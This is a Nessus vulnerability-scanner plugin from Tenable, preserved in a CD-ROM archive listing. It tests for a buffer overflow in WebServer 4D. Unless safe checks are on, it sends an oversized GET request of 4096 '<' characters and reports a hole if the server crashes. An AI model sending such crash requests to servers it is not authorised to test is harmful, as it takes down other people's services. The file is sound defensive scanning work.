home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / ws4d_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  67 lines

  1. #
  2. # (C) Tenable Network Security
  3. #
  4.  
  5.  
  6. if(description)
  7. {
  8.  script_id(11560);
  9.  script_bugtraq_id(7479);
  10.  script_version ("$Revision: 1.5 $");
  11.  name["english"] = "WebServer 4D GET Buffer Overflow";
  12.  script_name(english:name["english"]);
  13.  
  14.  desc["english"] = "
  15. It is possible to kill the web server by
  16. sending an oversized string of '<' as an argument
  17. to a GET request.
  18.  
  19. A cracker may exploit this vulnerability to make your web server
  20. crash continually or even execute arbirtray code on your system.
  21.  
  22. Solution : upgrade your software or protect it with a filtering reverse proxy
  23. Risk factor : High";
  24.  
  25.  script_description(english:desc["english"]);
  26.  
  27.  summary["english"] = "Crashes 4D WS";
  28.  script_summary(english:summary["english"]);
  29.  
  30.  script_category(ACT_MIXED_ATTACK);
  31.  
  32.  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
  33.  family["english"] = "Denial of Service";
  34.  script_family(english:family["english"]);
  35.  script_dependencies("find_service.nes", "http_version.nasl", "no404.nasl");
  36.  script_require_ports("Services/www", 80);
  37.  exit(0);
  38. }
  39.  
  40. ########
  41.  
  42. include("http_func.inc");
  43.  
  44. port = get_http_port(default:80);
  45.  
  46. if(! get_port_state(port)) exit(0);
  47.  
  48. if( safe_checks() )
  49. {
  50.  banner = get_http_banner(port:port);
  51.  if(!banner)exit(0);
  52.  if(egrep(pattern:"^Server: Web_Server_4D/([0-2]\..*|3\.([0-5]|6\.0))[^0-9]", string:banner))security_hole(port);
  53.  exit(0);
  54. }
  55.  
  56. if(http_is_dead(port:port))exit(0);
  57.  
  58. soc = http_open_socket(port);
  59. if(! soc) exit(0);
  60.  
  61. req = http_get(item:"/" + crap(data:"<", length:4096), port:port);
  62. send(socket:soc, data:req);
  63. r = http_recv(socket:soc);
  64. http_close_socket(soc);
  65.  
  66. if (http_is_dead(port: port)) security_hole(port);
  67.